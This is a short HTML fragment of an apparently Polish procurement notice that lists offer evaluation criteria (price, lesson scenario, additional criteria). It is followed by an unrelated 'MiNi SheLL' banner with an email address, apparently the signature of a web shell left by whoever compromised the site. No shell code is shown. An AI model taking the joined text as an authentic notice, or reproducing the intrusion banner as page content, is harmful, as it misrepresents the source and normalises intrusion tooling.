<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com